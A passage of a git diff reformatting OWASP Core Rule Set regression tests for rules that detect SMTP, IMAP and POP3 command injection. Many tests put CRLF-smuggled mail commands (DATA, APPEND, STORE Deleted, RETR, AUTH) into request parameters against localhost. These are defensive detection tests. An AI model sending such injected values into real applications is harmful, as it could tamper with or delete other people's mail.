textarea=S%3A%20220%20foo.com%20Simple%20Mail%20Transfer%20Service%20Ready%0AC%3A%20EHLO%20bar.com%0AS%3A%20250-foo.com%20greets%20bar.com%0AS%3A%20250-8BITMIME%0AS%3A%20250-SIZE%0AS%3A%20250-DSN%0AS%3A%20250%20HELP%0AC%3A%20MAIL%20FROM%3A%3CSmith%40bar.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CJones%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CGreen%40foo.com%3E%0AS%3A%20550%20No%20such%20user%20here%0AC%3A%20RCPT%20TO%3A%3CBrown%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20DATA%0AS%3A%20354%20Start%20mail%20input%3B%20end%20with%20%3CCRLF%3E.%3CCRLF%3E%0AC%3A%20Blah%20blah%20blah...%0AC%3A%20...etc.%20etc.%20etc.%0AC%3A%20.%0AS%3A%20250%20OK%0AC%3A%20QUIT%0AS%3A%20221%20foo.com%20Service%20closing%20transmission%20channel + version: HTTP/1.0 + output: + log: + no_expect_ids: [932300] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml index ce81d351b..ba80b3424 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml @@ -2,124 +2,123 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: SMTP Command Injection test cases PL3" - enabled: true - name: 932301.yaml +rule_id: 932301 tests: - - test_title: 932301-1 + - test_id: 1 desc: "SMTP DATA Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?test=%0d%0aDATA" - version: HTTP/1.0 - output: - log_contains: id "932301" - - test_title: 932301-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?test=%0d%0aDATA" + version: HTTP/1.0 + output: + log: + expect_ids: [932301] + - test_id: 2 desc: "SMTP DATA Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=We%20need%20that%20data%20now" - version: HTTP/1.0 - output: - no_log_contains: id "932301" - - test_title: 932301-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=We%20need%20that%20data%20now" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932301] + - test_id: 3 desc: "SMTP Command Injection negative test 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20World.%0adata%20not%20found. - version: HTTP/1.0 - output: - no_log_contains: id "932301" - - test_title: 932301-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20World.%0adata%20not%20found. + version: HTTP/1.0 + output: + log: + no_expect_ids: [932301] + - test_id: 4 desc: "SMTP QUIT Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aQUIT" - version: HTTP/1.0 - output: - log_contains: id "932301" - - test_title: 932301-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aQUIT" + version: HTTP/1.0 + output: + log: + expect_ids: [932301] + - test_id: 5 desc: "SMTP Command QUIT Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hey%20please%20do%20not%20quit - version: HTTP/1.0 - output: - no_log_contains: id "932301" - - test_title: 932301-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hey%20please%20do%20not%20quit + version: HTTP/1.0 + output: + log: + no_expect_ids: [932301] + - test_id: 6 desc: "SMTP HELP Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aHELP%20Postmaster" - version: HTTP/1.0 - output: - log_contains: id "932301" - - test_title: 932301-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aHELP%20Postmaster" + version: HTTP/1.0 + output: + log: + expect_ids: [932301] + - test_id: 7 desc: "SMTP HELP Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20This%20text%20needs%20help%20now - version: HTTP/1.0 - output: - no_log_contains: id "932301" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20This%20text%20needs%20help%20now + version: HTTP/1.0 + output: + log: + no_expect_ids: [932301] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml index 347114052..12a1676a0 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml @@ -2,144 +2,143 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: IMAP Command Injection test cases" - enabled: true - name: 932310.yaml +rule_id: 932310 tests: - - test_title: 932310-1 + - test_id: 1 desc: "IMAP APPEND Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0AA003%20APPEND%20saved-messages%20(%5CSeen)%20%7B310%7D%0D%0A%20Date%3A%20Mon%2C%207%20Feb%201994%2021%3A52%3A25%20-0800%20(PST)%0D%0A%20From%3A%20Test%20CRS%20%3Ctest%40coreruleset.org%3E%0D%0A%20Subject%3A%20Appending%0D%0A%20To%3A%20test%40coreruleset.org%0D%0A%20Message-Id%3A%20%3CB27397-0100000%40coreruleset.org%3E%0D%0A%20MIME-Version%3A%201.0%0D%0A%20Content-Type%3A%20TEXT%2FPLAIN%3B%20CHARSET%3DUS-ASCII%0D%0A%20%0D%0A%20Hello%20World%2C%20can%20I%20append%3F - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0AA003%20APPEND%20saved-messages%20(%5CSeen)%20%7B310%7D%0D%0A%20Date%3A%20Mon%2C%207%20Feb%201994%2021%3A52%3A25%20-0800%20(PST)%0D%0A%20From%3A%20Test%20CRS%20%3Ctest%40coreruleset.org%3E%0D%0A%20Subject%3A%20Appending%0D%0A%20To%3A%20test%40coreruleset.org%0D%0A%20Message-Id%3A%20%3CB27397-0100000%40coreruleset.org%3E%0D%0A%20MIME-Version%3A%201.0%0D%0A%20Content-Type%3A%20TEXT%2FPLAIN%3B%20CHARSET%3DUS-ASCII%0D%0A%20%0D%0A%20Hello%20World%2C%20can%20I%20append%3F + version: HTTP/1.0 + output: + log: + expect_ids: [932310] + - test_id: 2 desc: "IMAP APPEND Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=I%20wanted%20to%20append%20something%20%28annoying%29%20%7Bclosed%7D" - version: HTTP/1.0 - output: - no_log_contains: id "932310" - - test_title: 932310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=I%20wanted%20to%20append%20something%20%28annoying%29%20%7Bclosed%7D" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932310] + - test_id: 3 desc: "IMAP AUTHENTICATE Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0Aa001%20authenticate%20PLAIN%0D%0A - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0Aa001%20authenticate%20PLAIN%0D%0A + version: HTTP/1.0 + output: + log: + expect_ids: [932310] + - test_id: 4 desc: "IMAP AUTHENTICATE Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Cannot%20authenticate%20anyways" - version: HTTP/1.0 - output: - no_log_contains: id "932310" - - test_title: 932310-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Cannot%20authenticate%20anyways" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932310] + - test_id: 5 desc: "IMAP STATUS Command injection positive test" # STATUS [a-zA-Z0-9\"\./%\*&]+? (?:\((UNSEEN|UIDNEXT|MESSAGES|UIDVALIDITY|RECENT| )+\))? stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0Aa001%20STATUS%20INBOX%20(MESSAGES) - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0Aa001%20STATUS%20INBOX%20(MESSAGES) + version: HTTP/1.0 + output: + log: + expect_ids: [932310] + - test_id: 6 desc: "IMAP STATUS Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Please%20send%20me%20an%20update%20status%20all%20messages%20are%20being%20denied" - version: HTTP/1.0 - output: - no_log_contains: id "932310" - - test_title: 932310-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Please%20send%20me%20an%20update%20status%20all%20messages%20are%20being%20denied" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932310] + - test_id: 7 desc: "IMAP UID Command injection positive test" # UID (COPY|FETCH|STORE) [0-9,:\*]+? stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0Aa001%20uid%20store%20231%3A233%0D%0A - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0Aa001%20uid%20store%20231%3A233%0D%0A + version: HTTP/1.0 + output: + log: + expect_ids: [932310] + - test_id: 8 desc: "IMAP UID Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=The%20uid%20is%020not%020working" - version: HTTP/1.0 - output: - no_log_contains: id "932310" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=The%20uid%20is%020not%020working" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932310] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml index e8b31cdb2..2ab494b9c 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml @@ -2,237 +2,236 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: IMAP Command Injection test cases PL3" - enabled: true - name: 932311.yaml +rule_id: 932311 tests: - - test_title: 932311-1 + - test_id: 1 desc: "IMAP CREATE/DELETE/EXAMINE/SELECT/SUBSCRIBE/UNSUBSCRIBE Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aa001%20EXAMINE%20INBOX" - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aa001%20EXAMINE%20INBOX" + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 2 desc: "IMAP CREATE/DELETE/EXAMINE/SELECT/SUBSCRIBE/UNSUBSCRIBE Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - X-injection-header: "CREATE:1" - method: GET - port: 80 - uri: "/get?text=We%examine%20this%20mail%20from%20Mars" - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + X-injection-header: "CREATE:1" + method: GET + port: 80 + uri: "/get?text=We%examine%20this%20mail%20from%20Mars" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932311] + - test_id: 3 desc: "IMAP COPY Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aa002%20copy%202%3A4%20MEETING - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aa002%20copy%202%3A4%20MEETING + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 4 desc: "IMAP COPY Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Just%20to%20remind%20you%20that%20I%20need%20to%20copy%20those%20documents - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Just%20to%20remind%20you%20that%20I%20need%20to%20copy%20those%20documents + version: HTTP/1.0 + output: + log: + no_expect_ids: [932311] + - test_id: 5 desc: "IMAP LIST Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA1%20list%20%22INBOX%2F%22%20%22%2A%22 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA1%20list%20%22INBOX%2F%22%20%22%2A%22 + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 6 desc: "IMAP LIST Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=We%20need%20the%20list%20%22ASAP%22 - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=We%20need%20the%20list%20%22ASAP%22 + version: HTTP/1.0 + output: + log: + no_expect_ids: [932311] + - test_id: 7 desc: "IMAP STORE Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0ad%20store%202%20%2BFLAGS%20%28%5CDeleted%29 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0ad%20store%202%20%2BFLAGS%20%28%5CDeleted%29 + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 8 desc: "IMAP STORE Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0aLet%27s%20go%20to%20the%20store%20%28sale%20time%21%29 - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0aLet%27s%20go%20to%20the%20store%20%28sale%20time%21%29 + version: HTTP/1.0 + output: + log: + no_expect_ids: [932311] + - test_id: 9 desc: "IMAP SEARCH Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA282%20SEARCH%20FLAGGED%20SINCE%201-Feb-1994%20NOT%20FROM%20%22Smith%22 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA282%20SEARCH%20FLAGGED%20SINCE%201-Feb-1994%20NOT%20FROM%20%22Smith%22 + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 10 desc: "IMAP SEARCH with CHARSET Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aZ001%20SEARCH%20CHARSET%20WINDOWS-1252%20DELETED%20SINCE%201-Feb-1994 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aZ001%20SEARCH%20CHARSET%20WINDOWS-1252%20DELETED%20SINCE%201-Feb-1994 + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 11 desc: "IMAP SEARCH using TEXT Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA283%20SEARCH%20TEXT%20%22string%20not%20in%20mailbox%22 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA283%20SEARCH%20TEXT%20%22string%20not%20in%20mailbox%22 + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 12 desc: "IMAP SEARCH using CHARSET and range Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA284%20SEARCH%20CHARSET%20UTF-8%20TEXT%20%7B6%7D - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA284%20SEARCH%20CHARSET%20UTF-8%20TEXT%20%7B6%7D + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 13 desc: "IMAP SEARCH Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=In%20all%20search%20keys%20that%20use%20strings%2C%20a%20message%20matches%20the%20key%20if%20the%20string%20is%20a%20substring%20of%20the%20field.%20%20The%20matching%20is%20case-insensitive. - version: HTTP/1.0 - output: - no_log_contains: id "932311" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=In%20all%20search%20keys%20that%20use%20strings%2C%20a%20message%20matches%20the%20key%20if%20the%20string%20is%20a%20substring%20of%20the%20field.%20%20The%20matching%20is%20case-insensitive. + version: HTTP/1.0 + output: + log: + no_expect_ids: [932311] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml index 34be803b8..248e5e706 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml @@ -2,192 +2,191 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: POP3 Command Injection test cases" - enabled: true - name: 932320.yaml +rule_id: 932320 tests: - - test_title: 932320-1 + - test_id: 1 desc: "POP3 RETR/DELE Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aRETR%20123" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aRETR%20123" + version: HTTP/1.0 + output: + log: + expect_ids: [932320] + - test_id: 2 desc: "POP3 RETR Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Let%20me%20retrieve%2010%20of%20those" - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Let%20me%20retrieve%2010%20of%20those" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932320] + - test_id: 3 desc: "POP3 DELE Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=We%20should%20delete%20nine - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=We%20should%20delete%20nine + version: HTTP/1.0 + output: + log: + no_expect_ids: [932320] + - test_id: 4 desc: "POP3 LIST Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0alist%203" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0alist%203" + version: HTTP/1.0 + output: + log: + expect_ids: [932320] + - test_id: 5 desc: "POP3 LIST Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=This%20text%20is%20a%20way%20of%20list%203%20things - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=This%20text%20is%20a%20way%20of%20list%203%20things + version: HTTP/1.0 + output: + log: + no_expect_ids: [932320] + - test_id: 6 desc: "POP3 TOP Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aTOP%201%202" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aTOP%201%202" + version: HTTP/1.0 + output: + log: + expect_ids: [932320] + - test_id: 7 desc: "POP3 TOP Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=These%20are%20top%10%20rules - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=These%20are%20top%10%20rules + version: HTTP/1.0 + output: + log: + no_expect_ids: [932320] + - test_id: 8 desc: "POP3 AUTH Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aAUTH%20corerulest%20dGhpc2lzIWF0ZXN0cGFzc3dvcmQ=" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aAUTH%20corerulest%20dGhpc2lzIWF0ZXN0cGFzc3dvcmQ=" + version: HTTP/1.0 + output: + log: + expect_ids: [932320] + - test_id: 9 desc: "POP3 AUTH Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hey%2C%20sent%20me%20those%20auth%20codes%20please! - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hey%2C%20sent%20me%20those%20auth%20codes%20please! + version: HTTP/1.0 + output: + log: + no_expect_ids: [932320] + - test_id: 10 desc: "POP3 APOP Command injection positive test" stages: - - 